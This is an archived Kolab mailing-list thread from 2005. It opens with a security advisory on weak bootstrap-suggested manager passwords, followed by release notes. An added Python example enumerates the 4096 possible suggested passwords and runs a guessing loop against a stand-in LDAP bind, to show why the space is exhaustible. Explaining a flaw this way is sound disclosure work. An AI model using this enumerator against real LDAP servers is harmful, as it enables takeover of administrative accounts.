From bh at intevation.de Thu Feb 10 13:57:35 2005 
From: bh at intevation.de (Bernhard Herzog)
Date: Thu, 10 Feb 2005 13:57:35 +0100
Subject: [Kolab-announce] Security Advisory 01 for Kolab Server
Message-ID: <20050210125735.GA2729@intevation.de>

A security problem affecting Kolab 1 and 2 servers has been discovered.
Installations where the manager password suggested by the bootstrap script
was accepted unchanged and some development installations are vulnerable.
Fixes are available. See the security advisory below for more details.

Bernhard Herzog

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Kolab Security Issue 01 20050209
================================

Package:            kolab
Vulnerability:      privilege escalation
Kolab Specific:     yes
Dependent Packages: none

Summary
- -------

The kolab_bootstrap script for the Kolab Server suggested passwords
vulnerable to either dictionary or brute force attacks for the
administrative account "manager" and some other internal Kolab users
(namely "nobody" and "calendar"). Each of the passwords was chosen from a
set of only 4096 possibilities.

Possible Effects
- ----------------

(A) Only when the suggested manager password was accepted unchanged, a
    remote attacker could get full write access to the Kolab LDAP tree by
    using either brute force or dictionary attacks. Write access to the
    Kolab LDAP tree factually means full control of the Kolab server.

(B) As the nobody user has no further permissions and is internally only
    used as an alternative to anonymous binding, this will not leak
    sensitive information when the password is successfully tested.

(C) Kolab users giving the Kolab calendar user write permissions on their
    folders are vulnerable to having their calendar folders accessible by
    an attacker. The calendar user was introduced 20041014 in the Kolab 2
    development branch and is not used in any of the Kolab 1 servers.

Servers that have problem (A) and (B):

  Kolab 1 Server: before 20041213 (version 1.0.25 is safe)
    OpenPKG (independent of with_genuine setting)
      CURRENT      kolab-20040503-20041207
      RELEASE 2.2  kolab-20040503-2.2.0
      RELEASE 2.1  kolab-20040503-2.1.0
  Kolab 1 Server Mandrake: versions up to 1.0-0.61mdk
  Kolab 2 Server: before 20041122 (development branch)

Servers that have problem (C):

  Kolab 2 Server: after 20041014 but before 20041123 (development branch)

Fixes
- -----

The problems with the bootstrapping script (kolab_bootstrap) have been
silently fixed in the Kolab 2 development branch since 20041201 and with
an update of Kolab 1 since 20041213.

Released packages that contain the fixes:

  Kolab 1:
    http://max.kde.org:8080/mirrors/www.erfrakon.de/projects/kolab/download/kolab-server-1.0/src/kolab-1.0-1.0.25.src.rpm
    OpenPKG (independent of with_genuine setting)
      CURRENT      kolab-20040503-20041214
      RELEASE 2.2  kolab-20040503-2.2.1
      RELEASE 2.1  kolab-20040503-2.1.1
    Mandrake: versions from 0.62mdk on are corrected

  Kolab 2:
    Oldest Kolab 2 package with a fix (the beta releases are newer than this):
    ftp.kolab.org/kolab/server/development/20041201-full/sources/kolabd-1.9.3-20041201.src.rpm

How to fix existing installations:

1.) Stop the Kolab server using
      /kolab/etc/rc.d/rc.kolab stop   (Kolab 1 method)
    or
      /kolab/etc/rc all stop          (Kolab 2 method)

    (a) New installations of the Kolab 1 server (>= 1.0.25) are not
        vulnerable to Problem (A) as fixes got incorporated into the
        current (20041213) package. Please note that the Kolab 2
        development is already in late Beta stage. We therefore strongly
        recommend going with Kolab 2 for new installations or major
        renovations.

    (b) New installations of the Kolab 2 development branch (> 20041122)
        are not vulnerable to Problem (A) as fixes got incorporated into
        the current package.

    (c) Existing installations of Kolab 1 are vulnerable to Problem (A)
        if the suggested manager password was accepted instead of being
        manually chosen. This problem can be fixed without the need to
        upgrade the installation by choosing a more secure manager
        password manually. Please note that during an update of a Kolab
        installation the manager password is preserved, so every affected
        installation is asked to choose a more secure manager password
        manually. We are assisting this process by providing a
        kolabpasswd script for Kolab 1.

    (d) Existing installations of the Kolab 2 development branch are
        vulnerable to Problem (A) if the suggested manager password was
        accepted instead of being manually chosen. This problem can be
        fixed without the need to upgrade the installation by choosing a
        more secure manager password manually. We are assisting this
        process by providing a kolabpasswd script for Kolab 2. Due to the
        fact that Kolab 2 is in Beta we generally recommend upgrading to
        the most recent package, but during an update the manager
        password is preserved, so every affected installation is asked to
        choose a more secure manager password manually.

    (e) Changing the nobody password on existing installations (Kolab 1
        and Kolab 2) as a remedy for Flaw (B) using
          kolabpasswd nobody
        is optional. We recommend using the password proposed by
        kolabpasswd, as this password is only for internal use within
        Kolab and never needs manual entering.

    (f) Change the calendar password on existing installations vulnerable
        to Problem (C) using
          kolabpasswd calendar
        We recommend using the password proposed by kolabpasswd, as this
        password is only of internal use and never needs manual entering.

2.) Start the Kolab server using
      /kolab/etc/rc all start          (Kolab 2 method)
    or
      /kolab/etc/rc.d/rc.kolab start   (Kolab 1 method)

Details of the security problem
- -------------------------------

kolab_bootstrap used the following commands for suggesting passwords:

  @@@kolab_prefix@@@/bin/openssl passwd kolab
  @@@kolab_prefix@@@/bin/openssl passwd nobody
  @@@kolab_prefix@@@/bin/openssl passwd calendar

This is a weak implementation of suggesting passwords and is subject to
brute force and dictionary attacks. The new code looks like

  @@@kolab_prefix@@@/bin/openssl rand -base64 12
  @@@kolab_prefix@@@/bin/openssl rand -base64 30
  @@@kolab_prefix@@@/bin/openssl rand -base64 30

Timeline
- --------

20041201 Problem detected by Bernhard Reiter and Bernhard Herzog from
         Intevation GmbH. Developers notified.
20041202 Analysis. First fix of the scripts in the Kolab CVS (Kolab 2)
         and manual recovery instructions.
20041203 Vendors notified.
20041213 Convenience scripts provided (kolabpasswd) by Martin Konold and
         Tassilo Erlewein from erfrakon.
20041213 Kolab 1 update package available.
20041214 Updated Kolab 1 OpenPKG packages available (Thomas Lotterer).
20050209 Kolab security advisory published.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.0 (GNU/Linux)

iD8DBQFCClPf0vCiU5+ISsgRAkFhAKD4X7DHhmBlKBMg0xjxWGtJ1pDQmwCfYVvF
BxXGUo1bHuuuI5keKRDRQqw=
=sPkd
-----END PGP SIGNATURE-----
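Where the advisory's "4096 possibilities" comes from: `openssl passwd kolab` prints the traditional crypt(3) DES hash of the fixed word "kolab" under a random two-character salt drawn from a 64-symbol alphabet, so only 64 * 64 = 4096 distinct strings could ever have been suggested, and every one of them is computable by anybody who has read kolab_bootstrap. An attacker therefore does not need to crack anything; 4096 LDAP bind attempts against the manager DN exhaust the space. The Python below is an added example, not part of the advisory or of the Kolab code base: it enumerates that candidate space, drives a constructed stand-in for the LDAP bind (a plain equality check on a planted password), and contrasts the 12-bit space with the 96 bits of the corrected `openssl rand -base64 12`. It assumes Python's `crypt` module where available (removed in Python 3.13); where DES crypt is missing, a deterministic stand-in hash is substituted and labelled as such, which changes the strings but not the size of the space, which is the whole point.

```python
"""Added example (not part of the Kolab advisory or the Kolab code base):
why `openssl passwd kolab` gave a 4096-entry password space, how an
online guesser exhausts it, and what `openssl rand -base64 12` gives instead."""
import base64
import hashlib
import itertools
import math
import secrets

try:
    import crypt as _crypt_mod  # crypt(3) wrapper; removed in Python 3.13
except ImportError:
    _crypt_mod = None

# Traditional crypt(3) salt alphabet: 64 symbols, two of them per salt.
SALT_CHARS = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def bootstrap_suggestion(word, salt):
    """What `openssl passwd <word>` printed: crypt(3) of <word> under a
    two-character salt. Falls back to a labelled stand-in when DES crypt
    is unavailable; the stand-in is NOT the real transform, it only keeps
    the property that matters here (exactly one output per salt)."""
    if _crypt_mod is not None:
        try:
            out = _crypt_mod.crypt(word, salt)
        except (OSError, ValueError):
            out = None
        if out and not out.startswith("*"):  # "*0"/"*1" = DES disabled
            return out
    digest = hashlib.sha256((salt + word).encode()).digest()  # stand-in
    return salt + base64.b64encode(digest)[:11].decode()


def candidate_passwords(word="kolab"):
    """Every string the old kolab_bootstrap could have suggested for <word>."""
    return [bootstrap_suggestion(word, a + b)
            for a, b in itertools.product(SALT_CHARS, repeat=2)]


def guess_password(try_bind, word="kolab"):
    """Online attack against the LDAP bind: try each candidate in turn.
    try_bind(pw) -> bool stands in for a simple bind as the manager DN.
    Returns (password, attempts) on success or (None, attempts)."""
    attempts = 0
    for cand in candidate_passwords(word):
        attempts += 1
        if try_bind(cand):
            return cand, attempts
    return None, attempts


def suggested_entropy_bits():
    """Entropy of the old suggestion: log2(64 ** 2) = 12 bits."""
    return math.log2(len(SALT_CHARS) ** 2)


def fixed_suggestion(nbytes=12):
    """The corrected bootstrap: equivalent of `openssl rand -base64 <nbytes>`."""
    return base64.b64encode(secrets.token_bytes(nbytes)).decode()


def fixed_entropy_bits(nbytes=12):
    """Entropy of the new suggestion: 8 bits per random byte (96 for 12)."""
    return 8 * nbytes


if __name__ == "__main__":
    # Constructed target: a server whose manager password is the unchanged
    # bootstrap suggestion. The salt "Kx" is arbitrary.
    planted = bootstrap_suggestion("kolab", "Kx")
    recovered, n = guess_password(lambda pw: pw == planted)
    print(f"manager password {recovered!r} found after {n} of at most 4096 binds")
    print(f"old suggestion: {suggested_entropy_bits():.0f} bits; "
          f"new suggestion: {fixed_entropy_bits()} bits, e.g. {fixed_suggestion()!r}")
```

The same enumeration applies unchanged to the "nobody" and "calendar" accounts by passing that word instead of "kolab"; the dictionary the advisory mentions is exactly this list. Note also that the fix generates the manager suggestion from 12 random bytes but the two internal accounts from 30, since those are never typed by a human.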
From: bernhard at intevation.de (Bernhard Reiter)
Date: Thu, 10 Mar 2005 15:39:09 +0100
Subject: [Kolab-announce] Kolab-Server-2.0-beta-3 released, includes security fixes
Message-ID: <200503101539.14142.bernhard@intevation.de>

Kolab 2 Server beta 3 released.

The third beta of the Kolab 2 server implementation is out on the mirrors.
It fixes security issues and a few bugs. Details can be found in the
release notes.

http://www.kolab.org/

You can see Kolab 2 at CeBIT Hall 6 in the KDE booth within LinuxPark.

-------------- next part --------------
Release notes Kolab2 Server 20050309
(Version 20050309, Kolab server 2.0 beta 3)

For upgrading and installation instructions, please refer to the
README.1st file in the source directory.

Changes since Beta 2, 20050114:

- updated to openpkg version 2.2.2
- updated imapd, zlib and clamav packages. These updates fix security
  issues.
- kolabd 20050114 -> 20050221
  kolab_bootstrap stops when ldap cannot be accessed instead of carrying
  on and merely warning about it
  main.cf.template now sets message_size_limit to 20 MiB
  * Fixing:
    Issue626 (/kolab/etc/rc all start starts proftpd)
    Issue615 (smtppolicy sometimes fails because ldap lookup fails)
    Issue649 (logrotation for all logs)
- kolab-resource-handlers 20050114 -> 20050221
  * Fixing:
    Issue610 (html mails get corrupted)
    Issue641 (extra slash in pfb trigger url)
    Issue638 (cannot trigger other account's pfb creation)
    Issue651 (fix install warnings)
- kolab-webadmin 20050114 -> 20050222
  Shows visibility of distribution lists in the distribution list overview
  * Fixing:
    Issue635 (Cannot send mail to UPPER CASE shared folder)
    Issue646 (global shared folder with non-ascii characters)
    Issue672 (virusalert at domain.tld and MAILER-DAEMON at domain.tld added)
- perl-kolab 20050110 -> 20050221
  * Fixing:
    Issue621 (comment char # in kolab.conf)
    Issue656 (public folders: No annotations and cannot create)

-------------- next part --------------
Upgrade from Beta2
------------------

The compile time options of apache and php have changed a little to
enable multibyte strings. Unfortunately, obmtool will not automatically
recompile the packages for you. To make sure the packages are recompiled,
you need to uninstall the packages and remove the binary RPMs from
/kolab/RPM/PKG:

  /kolab/bin/openpkg rpm -e --nodeps apache php
  rm /kolab/RPM/PKG/apache-*
  rm /kolab/RPM/PKG/php-4*

-------------- next part --------------
A non-text attachment was scrubbed...
Name: smime.p7s
Type: application/pkcs7-signature
Size: 2145 bytes
Desc: signature
Url : http://kolab.org/pipermail/kolab-announce/attachments/20050310/4b259ae0/smime.bin

From bernhard at intevation.de Sat Mar 26 19:06:56 2005
From: bernhard at intevation.de (Bernhard Reiter)
Date: Sat, 26 Mar 2005 19:06:56 +0100
Subject: [Kolab-announce] Kolab-Server-2.0-beta-4 released
Message-ID: <200503261907.01366.bernhard@intevation.de>

Kolab 2 Server beta 4 available

The fourth beta of the Kolab 2 Server now also offers a German admin
interface. The team welcomes additional translations. Some minor
improvements were made and, as always: the mirrors are your friends.
Thanks to Belnet at this point for providing another mirror for Kolab.

-------------- next part --------------
Release notes Kolab2 Server
(Version 20050324, Kolab server 2.0 beta 4)

For upgrading and installation instructions, please refer to the
README.1st file in the source directory.

Changes since Beta 3, 20050309:

- updated obmtool. It's now rev. 1.42 from OpenPKG.
- kolabd 20050221 -> 20050318
  Add support for EQUALITY and SUBSTRING to kolab2.schema
  Better indexing for OpenLDAP: added pres to ldap db indices.
  See README.1st for how this affects an upgrade.
- kolab-resource-handlers 20050221 -> 20050318
  kolab_smtpdpolicy grew an option to check Sender: if it exists instead
  of From:. This is turned off by default as it allows sending emails
  "on behalf of" without being email-delegate.
  * Fixing:
    Issue648 (resmgr generates empty PFBs for normal users)
- kolab-webadmin 20050222 -> 20050318
  The web interface is internationalized now. Languages currently
  supported are English and German.
  Attribute access by normal users is now configurable. Attributes can be
  made e.g. read-only, mandatory or invisible.
  Some more vacation settings:
  - whether to react to spam
  - restrict vacation messages to a specific domain
  Updated some texts, email addresses and URLs.
  * Fixing:
    Issue672 (added virusalert at domain.tld and MAILER-DAEMON at domain.tld)
    Issue646 (non-ascii chars in names of global folders)
- perl-kolab 20050221 -> 20050318
  * Fixing:
    Issue656 (re-added a right to shared folder all access)
    Issue687 (deletion logic)

-------------- next part --------------
A non-text attachment was scrubbed...
Name: smime.p7s
Type: application/pkcs7-signature
Size: 2145 bytes
Desc: signature
Url : http://kolab.org/pipermail/kolab-announce/attachments/20050326/30ed6e5a/smime.bin

From bernhard at intevation.de Mon Apr 25 18:03:56 2005
From: bernhard at intevation.de (Bernhard Reiter)
Date: Mon, 25 Apr 2005 18:03:56 +0200
Subject: [Kolab-announce] Kolab-Server-2.0-beta-4 published
Message-ID: <200504251803.58050.bernhard@intevation.de>

Kolab 2 Server beta 5 published.

The fifth beta of Kolab 2 Server comes with minor fixes and improvements.

-------------- next part --------------
Release notes Kolab2 Server
(Version 20050422, Kolab server 2.0 beta 5)

For upgrading and installation instructions, please refer to the
README.1st file in the source directory.

Changes since Beta 4, 20050324:

- updated openpkg packages:
    openldap-2.2.23-2.3.0
    pth-2.0.4-2.3.0
- kolabd 20050318 -> 20050421
  amavisd configuration: A kolab user sending Spam/Virus mails gets a
  bounce notification. Mail sent from outside to a kolab user will, as
  before, still be held in quarantine and the recipient will get a
  notification.
  Added support for using a non-kolab ldap server instead of kolab's own
  server as master. This includes:
  - kolabd can listen to connections from other slurpds
  - deletion of ldap objects can be adapted to such setups (issue721).
  Added some documentation about the amavisd, web-admin and ldap-deletion
  configuration options in kolab.
  Some more ldap indices were added.
  * Fixing:
    Issue647 (Message "perl: No worthy mechs found" fills up logs)
    Issue681 (nobody/calendar password for slave)
    Issue708 (session storage)
    Issue706 (kolabpassword for calendar and nobody broken)
- kolab-resource-handlers 20050318 -> 20050412
  Better handling of mails with multiple recipients
  Main part of a fix for Issue665 (outlook appointment forwarding not
  possible with email spoof protection)
- kolab-webadmin 20050318 -> 20050422
  It is now configurable which account types can log in to the web-admin
  interface. E.g. login can be limited to normal users if administration
  is not to be done with the admin interface.
  Some more options for vacation notifications:
  - whether to send notifications for messages classified as spam or virus
  - limit notifications to certain domains.
  * Fixing:
    Issue660 (primary email addresses with incorrect maildomain)
- perl-kolab 20050318 -> 20050421
  * Fixing:
    Issue647 (Message "perl: No worthy mechs found" fills up logs)
    Issue698 (LDAP Sync can cause mailbox deletion)
- imapd imapd-2.2.12-2.3.0_kolab -> 2.2.12-2.3.0_kolab2
  * Fixing:
    Issue571 (allow more characters in mailbox names)

$Id: release-notes.txt,v 1.5 2005/04/22 17:14:59 bernhard Exp $

-------------- next part --------------
A non-text attachment was scrubbed...
Name: smime.p7s
Type: application/pkcs7-signature
Size: 2145 bytes
Desc: signature
Url : http://kolab.org/pipermail/kolab-announce/attachments/20050425/cc9a6160/smime.bin

From bernhard at intevation.de Wed May 4 13:23:12 2005
From: bernhard at intevation.de (Bernhard Reiter)
Date: Wed, 4 May 2005 13:23:12 +0200
Subject: [Kolab-announce] Kolab2 Clients out of beta, KDE Client release candidate 1 available
Message-ID: <200505041323.17511.bernhard@intevation.de>

The KDE Kolab2 client has been published as "release candidate 1" tarball
based on KDE 3.3. A logical consequence of good experiences with this
software during the last months. Get it from the download servers along
with the release notes (also attached for convenience).

The release comes so late because KDE packagers tend to build from stable
CVS branches and often do not rely on tarballs anyway.

On a related note: Toltec 2.0 release candidate 2 is also available.

-------------- next part --------------
Release notes for the Kolab KDE Client RC 1
===========================================

2005-05-03, Bernhard Herzog

Note: Many entries here contain references to entries in the kolab issue
tracker, https://intevation.de/roundup/kolab/. You can easily look them up
by appending the reference to that URL, e.g. the URL for issue510 is
https://intevation.de/roundup/kolab/issue510 . Some issues are specific
to the aegypten project (S/MIME for kmail) and can be looked up under
https://intevation.de/roundup/aegypten/

Upgrading from older (pre beta 1) kontact based clients
-------------------------------------------------------

If you have configured your kdepim installation with an older version of
the kolabwizard (or have done it manually) you may need to tweak the URL
Korganizer uses to fetch free/busy lists from the kolab2 server. The url
for fetching free/busy lists should be

  https://kolabserver/freebusy/%25EMAIL%25.ifb

Changes since Beta1 (2005-02-03)
--------------------------------

KMail
-----

- Fixed deletion of folders with subfolders (kolab issue678)
- Remove choice between Kolab-XML and ical/vcard as storage format, it's
  always kolab-xml in proko2.
- Fixed vanishing special icons when renaming/moving a special folder.
- Tell the resources when renaming a groupware folder (kolab issue639)
- Fixed header-list suddenly empty in rare cases.
- If there is no valid email address in the From header, but a name,
  display it.
- Don't let the "No HTML Message" label force a minimum height on the
  reader widget.
- Fixed utf8 in freebusy-trigger URLs (kolab issue640)
- Fixed inline forwarding of opaque signed and encrypted mails with
  attachments (part of issues 39/266)
- Don't attempt to sync up changed acls if the user has insufficient
  rights to do so.
- Fixed aegypten issue 295: "kmail encrypts entire mail though only
  attachment was to be encrypted"
- Aegypten proxy: kleopatra<->kmail communication (aegypten issue296)
- Aegypten proxy: disable proxy settings when "Ignore HTTP CRL DPs of
  certificate" is unchecked.
- Aegypten proxy: use honor-http-proxy option
- Fixed migration issue for users with an old kpgprc, broke decrypting
  mails.
- Vacation GUI extended, to restrict sending of vacation replies for
  known spam and to addresses outside of the company.
- "Copy folder to" feature.
- Fix message-status-handling broken by previous cached imap speedup
- Fix for syncing a new client with an already existing imap account
  (used to wrongly disable kolab resource)
- Fix for inline forwarding of inline invitation mails (content-type
  text/calendar),
- and another fix for "inline forwarding a mail consisting of only a top
  level body part".
- Fix the fix for completion order when an item would be listed multiple
  times.
- Fix temporary filename used for compacting a folder, to ensure no ghost
  folder appears on kmail restart
- Escape folder names when displaying them in error dialogs (kolab
  issue725)

Kolab XML Resource
------------------

- Fixed off-by-one in month names (kolab issue688)
- Yearly recurrence fix
- Fixed mapping of phone types to preserve "business2" and "company" from
  outlook.

Kolab Wizard
------------

- Remove kolab1 vs kolab2 choice, since kolab1 isn't available in proko2
  branch.
KPilot
------

- Updated to KDE_3_4_BRANCH's version, with some fixes so that it works
  with kdelibs-3.2.

Kleopatra
---------

- added Chiasmus support
- Redesigned automatic config dialog

Aegypten Backend
----------------

- added chiasmus support

Other
-----

- Fixed rare crash in kio_imap4
- Updated translations.

Known Bugs
----------

- When copying folders conflict resolution dialog boxes come up for the
  copied events (kolab issue727)
- kpilot warns about being used with kdelibs 3.2.x even though it has
  been backported to work in that environment. Already fixed in CVS.
- kpilot doesn't work properly yet with kolab resources. (kolab issue704)

-------------- next part --------------
A non-text attachment was scrubbed...
Name: smime.p7s
Type: application/pkcs7-signature
Size: 2145 bytes
Desc: signature
Url : http://kolab.org/pipermail/kolab-announce/attachments/20050504/80881b26/smime.bin

From bernhard at intevation.de Mon May 9 19:50:48 2005
From: bernhard at intevation.de (Bernhard Reiter)
Date: Mon, 9 May 2005 19:50:48 +0200
Subject: [Kolab-announce] Kolab Server 2.0-rc1 published.
Message-ID: <200505091950.52543.bernhard@intevation.de>

The first release candidate for Kolab 2 Server is public. Like the last
couple of betas there are only a few minor fixes and improvements in this
release. Attached the release notes.

-------------- next part --------------
Release notes Kolab2 Server
(Version 20050506, Kolab server 2.0 RC 1)

For upgrading and installation instructions, please refer to the
1st.README file in the source directory.

Changes since Beta 5, 20050422:

- kolabd 20050421 -> 20050503
  Run more than one instance of the kolabfilter to improve mail
  performance
  Add DB_CONFIG for openldap's database. Part of Issue707.
  Some more documentation:
  - how Kolab uses sieve
  - solution for invitations forwarded by Outlook
  * Fixing:
    Issue591 (show Kolab version)
- kolab-resource-handlers 20050412 -> 20050504
  some performance improvements
  * Fixing:
    Issue231 (german text in fbview)
    Issue665 (problems with appointments forwarded by outlook)
- kolab-webadmin 20050422 -> 20050428
  * Fixing:
    Issue533 (add mail attribute to distribution lists)
    Issue607 (do not remove users if they're single members of dlists)
    Issue591 (Kolab version in "About Kolab" page)
- perl-kolab 20050421 -> 20050503
  Add DB_CONFIG for openldap's database. Part of Issue707.
  * Fixing:
    Issue222 (no more "c" permissions for public folders)

$Id: release-notes.txt,v 1.7 2005/05/06 10:45:11 bh Exp $

-------------- next part --------------
A non-text attachment was scrubbed...
Name: smime.p7s
Type: application/pkcs7-signature
Size: 2145 bytes
Desc: signature
Url : http://kolab.org/pipermail/kolab-announce/attachments/20050509/f2a0d330/smime.bin

From bernhard at intevation.de Tue May 31 20:27:20 2005
From: bernhard at intevation.de (Bernhard Reiter)
Date: Tue, 31 May 2005 20:27:20 +0200
Subject: [Kolab-announce] Server 2.0-rc2 released/ advisory for rc1 and rc2
Message-ID: <200505312027.25041.bernhard@intevation.de>

Kolab-Server-2.0-rc2 is ready on the mirrors, but rc3 will follow shortly
as we found a critical bug after releasing rc2. Still, rc2 is interesting
for some people. Carefully check the attached release notes.

Best,
Bernhard

-------------- next part --------------
Release notes Kolab2 Server
(Version 20050527, Kolab server 2.0 RC 2)

For upgrading and installation instructions, please refer to the
1st.README file in the source directory.

WARNING

With Kolab-Servers 2.0-rc1 and 2.0-rc2 there is a chance to lose emails
which came in with a null sender (aka MAIL FROM:<>), if you enabled the
check to prevent users from forging From: headers. The fix will be in the
upcoming rc3; technical details are in issue774.

As a workaround, disable the "envelope header from" check: in
/kolab/etc/kolab/templates/resmgr.conf.template set

  $params['verify_from_header'] = false

and run kolabconf.

Changes since RC 1, 20050506:

- postfix 2.1.5-2.2.0_kolab -> 2.1.5-2.2.0_kolab2
  * Fixing:
    Issue746 (distributionlist duplicates emails)
- openldap 2.2.23-2.3.0 -> 2.2.23-2.3.0_kolab
  Make sure libdb is linked statically.
  Some more configuration tweaks. There's a new index on givenName among
  other things
  Build with native threads instead of using pth. This may help fix
  Issue707 (occasional slapd hangs after attempted writes)
- imapd 2.2.12-2.3.0_kolab2 -> 2.2.12-2.3.0_kolab3
  Make sure libdb is linked statically.
- kolabd 20050503 -> 20050526
  Localized virus/spam delivery status notifications. Only German so far.
  It's not enabled by default.
  * Fixing:
    Issue746 (distributionlist duplicates emails)
- kolab-resource-handlers 20050504 -> 20050520
  better error handling in filter scripts
  * Fixing:
    Issue744 (invitation policy not case independent)
- kolab-webadmin 20050428 -> 20050527
  localized vacation message text
  "no vacation replies to spam" is now default
  * Fixing:
    Issue745 (inconsistent groupOfNames when changing an account's DN)

$Id: release-notes.txt,v 1.10 2005/05/31 18:25:52 bernhard Exp $

-------------- next part --------------
A non-text attachment was scrubbed...
Name: smime.p7s
Type: application/pkcs7-signature
Size: 2145 bytes
Desc: signature
Url : http://kolab.org/pipermail/kolab-announce/attachments/20050531/8815e7e3/smime.bin

From bernhard at intevation.de Mon Jun 6 12:53:13 2005
From: bernhard at intevation.de (Bernhard Reiter)
Date: Mon, 6 Jun 2005 12:53:13 +0200
Subject: [Kolab-announce] Kolab
Message-ID: <200506061253.17196.bernhard@intevation.de>

Kolab 2 Server RC 3 released

The third release candidate of the Kolab2 Server implementation fixes a
few important bugs. Especially we have hopes that OpenLDAP behaves more
stably on GNU/Linux systems now.

Attached the latest revision of the release notes.

Best,
Bernhard

-------------- next part --------------
Release notes Kolab2 Server
(Version 20050603, Kolab server 2.0 RC 3)

For upgrading and installation instructions, please refer to the
1st.README file in the source directory.

Changes since RC 2, 20050527:

- The pth package has been removed
- clamav 0.83-2.3.0 -> 0.85.1-20050517
  * new upstream version, security relevant because of better detection.
- openldap-2.2.23-2.3.0_kolab -> openldap-2.2.23-2.3.0_kolab2
  * Some more fixes to make sure that it won't use pth. The changes in
    rc2 weren't enough. We hope to fix Issue707 (occasional slapd hangs
    after attempted writes) but this might break support for Solaris
    platforms in favour of GNU/Linux.
  * Some more performance tweaks.
  * Run db_recover when starting openldap
- postfix 2.1.5-2.2.0_kolab2 -> postfix-2.1.5-2.2.0_kolab3
  * Fixing:
    Issue774 (null senders would cause email loss)
- kolabd 20050526 -> 20050601
  * Fixing:
    Issue764 (unauthenticated free/busy not allowed with legacy mode)
    Issue777 (kolabconf error: cannot open legacy.conf.template)
    Issue768 (added postfix virtual map template)
    Issue774 (null senders would cause email loss)
- perl-kolab 20050503 -> 20050530
  * Fixing:
    Issue764 (unauthenticated free/busy not allowed with legacy mode)
    Issue768 (added postfix virtual map template)
- kolab-webadmin 20050527 -> 20050530
  support multi-valued mynetworks
  * Fixing:
    Issue769 (can create collision with external addressbook)
    Issue730 (Cannot rename user in Kolab2 Admin interface)

$Id: release-notes.txt,v 1.13 2005/06/06 10:43:07 bernhard Exp $

-------------- next part --------------
A non-text attachment was scrubbed...
Name: smime.p7s
Type: application/pkcs7-signature
Size: 2145 bytes
Desc: signature
Url : http://kolab.org/pipermail/kolab-announce/attachments/20050606/518eadb9/smime.bin

From bernhard at intevation.de Wed Jun 15 17:32:51 2005
From: bernhard at intevation.de (Bernhard Reiter)
Date: Wed, 15 Jun 2005 17:32:51 +0200
Subject: [Kolab-announce] KDE client close to release
Message-ID: <200506151732.55977.bernhard@intevation.de>

The third release candidate of the KDE Kolab2 Client based on KDE 3.3 is
public. After a short final testing period it will be declared stable.
As always, you can get the tarball from the mirrors. The release notes
are attached for your convenience.

Note that RC2 was not widely announced, because we found a critical bug
that prompted an RC3 release.

Regards,
Bernhard

-------------- next part --------------
Release notes for the Kolab KDE Client RC 3
===========================================

2005-06-10, Bernhard Herzog

Changes since RC 2 (2005-05-08)
-------------------------------

certmanager
-----------

* Key selection dialog: Work around bug in Qt where disabling and
  reenabling the widget that has focus does not properly make it refocus.
  This solves the problem that you had to click in the search line (even
  while the cursor was flashing there) to make it editable.

kmail
-----

* Show resource icons also for folders with unread mail.
* Only reset the content type to text/plain if it is a multipart
  currently, otherwise invitation replies get the wrong mime type :/
  (kolab issue790)
* Make it possible to configure alphabetical instead of weighted sorting
  of the completion entries via a checkbox in the completion editor
  dialog. Make sure changes there are picked up by the currently active
  addressee lineedits. (kolab issue734)
* Update version number to rc3

kontact
-------

* Update version number to rc3

korganizer
----------

* Import new event template management dialog from trunk, so that
  templates can be deleted (kolab issue763)
* Make sure the freebusy retrieval state is reset, when retrieval is not
  possible (kolab issue787)

kresources
----------

* Drop completed dates if the task is not completed on writing or
  reading.
Changes since RC 1 (2005-05-03)
-------------------------------

KOrganizer
----------

* Fix failure to enable "Reminder for first recurrence only" checkbox

KMail
-----

* Fix for conflict resolution dialogs when copying resource folders
* Chiasmus: Make canceling pinentry cancel the operation
* Fix for conflicting signing or encryption preferences
* Chiasmus: Implemented body encryption
* Chiasmus: Implemented body decryption
* Chiasmus: Fix content-type and chiasmus-charset in both cases (with and
  without attachments)
* Chiasmus: Fix wrong content-transfer-encoding in chiasmus-encrypted
  mails
* Add "Troubleshoot IMAP Cache..." to Folder menu (since it's already in
  the RMB)
* Fix for showing the IMAP-related menu item only if there is an IMAP
  account
* Fix to no longer show an error dialog when the IMAP server closes the
  connection
* Add an additional entry to the settings menu of the composer which
  allows access to the address completion weight configuration
* Fix for replying to or forwarding messages after they were opened in a
  separate reader window
* Create the default folders in the local language
* Fix for inline-forwarding or draft-editing mails with a signature
* Fix to force utf8 encoding on Kolab xml mail parts
* Use a different mimetype (application/x-vnd.kolab.contact.distlist) for
  distribution lists, as discussed on kolab-format
* Fix for dropping local only or distribution list contents of the "to"
  field during IDN expansion
* Remove the global "refresh cache" menu entry

Kolab XML Resource
------------------

* fix for reading and writing the pilot sync id and status to enable
  pilot syncing
* Make the scheduling ID an implementation detail not visible to the
  outside. It was removed from the specification.
* Drop completed dates if the task is not completed on writing or reading

LDAP Search and Completion
--------------------------

* Don't show structural entries, but only real persons, or everything
  that has an email address

Kontact
-------

* start the calendar part when accepting an invitation and it is not
  running yet

Updated Translations

-------------- next part --------------
A non-text attachment was scrubbed...
Name: smime.p7s
Type: application/pkcs7-signature
Size: 2145 bytes
Desc: signature
Url : http://kolab.org/pipermail/kolab-announce/attachments/20050615/95aa63bf/smime.bin

From bernhard at intevation.de Fri Jun 17 20:47:31 2005
From: bernhard at intevation.de (Bernhard Reiter)
Date: Fri, 17 Jun 2005 20:47:31 +0200
Subject: [Kolab-announce] Kolab Server 2.0 RC 4 published; security and bug fixes
Message-ID: <200506172047.36556.bernhard@intevation.de>

While the mirrors are catching up....

Kolab Server 2.0 RC 4 published; security and bug fixes

The latest and probably last release candidate for the Kolab Server 2
comes with two important bugfixes and draws a few security updates from
OpenPKG. After a brief testing period it will become the stable release.

Attached for your convenience: the release notes.

Bernhard

-------------- next part --------------
Release notes Kolab2 Server
(Version 20050617, Kolab server 2.0 RC 4)

For upgrading and installation instructions, please refer to the
1st.README file in the source directory.

Changes since RC 3, 20050603:

- Some openpkg security updates:
    openpkg 2.2.2-2.2.2 -> 2.2.3-2.2.3
    perl 5.8.5-2.2.1 -> 5.8.5-2.2.2
    bzip2 1.0.2-2.2.0 -> 1.0.2-2.2.1
    gzip 1.3.5-2.2.0 -> 1.3.5-2.2.1
- imap-2004a-2.2.0 -> imap-2004c-2.3.0_kolab
- apache-1.3.31-2.2.3_kolab -> apache-1.3.31-2.2.3_kolab2
